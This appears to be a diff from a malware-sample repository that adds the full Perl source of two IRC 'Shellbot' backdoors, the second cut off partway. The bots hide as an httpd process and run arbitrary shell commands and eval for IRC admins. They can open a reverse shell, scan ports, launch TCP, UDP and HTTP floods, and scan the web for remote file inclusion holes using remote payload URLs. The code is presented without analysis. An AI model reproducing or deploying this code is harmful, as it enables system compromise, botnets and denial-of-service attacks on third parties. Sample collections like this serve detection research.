} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}

611
Perl/Backdoor.Perl.Shellbot.aa Normal file
View File

@ -0,0 +1,611 @@
# VulnScan v7 -Final- By Morgan
#
# Note:
# DO NOT REMOVE COPYRIGHTS ...
#
# |_|0|_|
# |_|_|0|
# |0|0|0|
#
# New functions :
# Anti-Clone l33t
# Fixed Print on Infected Boxes
# Easy Configuration
# l33t Color
# BackConnect function (Usage: botname @back IP port)
#
#
# Scan command :
# !morgan !eval @gstring='google%20dork';
# !morgan @rfiscan vulnfile.php?vulnvar=
#
# DDoS commands :
# Udp : !morgan @udpflood IP packet-size time
# Tcp : !morgan @tcpflood IP port time
# Http: !morgan @httpflood www.website.com time
#
# Greets to :
#
# All #Morgan users...
#
#
# Enjoy the bot ....
# /Morgan
use HTTP::Request;
use LWP::UserAgent;
################ V7 CONFIGURATION #############################################################
my $processo = 'httpd -DSL -DSL2'; # Fake process name for the bot #
if (`ps uxw` =~ /httpd -DSL -DSL2/) # (CHANGE IT!!!) #
{ # #
exit; # #
} # #
###############################################################################################
my $linas_max='8'; # Avoid Flood #
###############################################################################################
my $sleep='5'; # sleep time #
##################### IRC #####################################################################
my @adms=("FabioMatador","dann123");
my @hostauth=("imbanaco2.att.net.co"); # Administrator Nickname #
###############################################################################################
my @canais=("#timao.eu"); # Channel ..if password -> ("#channel :pass") #
###############################################################################################
my $nick='efut'; # Nick prefix of the bot example : #
# vs[v7] = vs[v7]-718727 #
###############################################################################################
my $ircname = 'Dt Script'; # Identd of the bot #
###############################################################################################
chop (my $realname = `uname -a`); # Full Name #
###############################################################################################
$servidor='stockholm.se.quakenet.org' unless $servidor; # Server IRC of the bot #
###############################################################################################
my $porta='6667'; # Server PORT #
################ CMD ##########################################################################
my @cmdgif='http://fabiocpv.by.ru/aa.txt'; # If you change this cmd must be same as:#
# http://myspace.si/images/sad.gif #
###############################################################################################
my $VERSAO = 'v7';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
# MORGAN OWNED YOUR BOX
#
# morgan.rx@gmail.com
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!eft)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[SCAN]\003\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[SCAN]\003\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\0034[SCAN]\003\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[TCP DDoSing]\003\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[TCP DDoSing]\003\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[VERSION]\003\002 w0rmb0t ver ".$VERSAO);
}
if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[BackConnect]\003\002: Connecting to $host:$porta");
}
}
#SCANNER
if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
$boturl=$2;
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034Scan\003\002 » Scanning for Remote file inclusion using \002 ".$boturl." \002 for \002 ".$1." seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
#sendraw($IRC_cur_socket, "PRIVMSG #debug :\002\0034[x|Exploiting]\003\002 ".$url2."\n\n");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdgif?";
print "\n".$url2."\n\n";
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /By/ && $response->content =~ /Morgan/ ){
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Vulnerable]\003\002 ".$url2."\n\n");
}
}
else {
}
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Finished]\003\002 Scan finished in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[HTTP DDoSing]\003\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[HTTP]\003\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[UDP DDoSing]\003\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP-DDOS]\002 Média ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
{
my @dominios = ("removed-them-all");
my @str;
foreach $dom (@dominios)
{
push (@str,"@gstring");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
#sendraw("privmsg #Morgan :DEBUG only test googling: ".$query."");
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
# NOTE: DONT REMOVE COPYRIGHTS

568
Perl/Backdoor.Perl.Shellbot.ah Normal file
View File

@ -0,0 +1,568 @@
# SHELLBOT WITH VULNSCAN
# by destructive
# GREETINGZ:
# NOBODY, BECAUSE NOBODY HELPED US
#
#
#
# VISIT US ~
# IRC Network: irc.GigaChat.net
# IRC Channel: #Atk33
#
#
#
#
# pwn3d'
my $processo = 'httpd';
use HTTP::Request;
use LWP::UserAgent;
#CONFIGURATION
my $linas_max='4';
my $sleep='5';
my @cmdstring='http://raidenzin.freehostia.com/list.txt?';
my @adms=("Raiden","Morientes");
my @canais=("#Own");
my $nick='negrinhos';
my $ircname ='negrinhos';
chop (my $realname = `id`);
$servidor='211.220.193.249' unless $servidor;
my $porta='1999';
my $VERSAO = 'Shellbot RFI by destructive v1.0';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!crew)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!crew" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","66
69","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
}
#SCANNER
if ($funcarg =~ /^scan\s+(\d+)\s+(.*)\s+(.*)/) {
@gstring = $3;
$boturl=$2;
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Atk33]\002 Scan started. CMD: \002 @cmdstring \002 ");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
#sendraw($IRC_cur_socket, "PRIVMSG #debug :\002[Exploiting]\002 ".$url2."\n\n");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdstring?";
print "\n".$url2."\n\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
if( $response->content =~ /By/ && $response->content =~ /destructive/ ){
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Results]\002 ".$url2."\n\n");
}
}
else {
print 'Errore: ',$path,$response->status_line, "\n";
}
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Finished]\002 Scan finished in ".$1." seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3."
seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} +
$bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
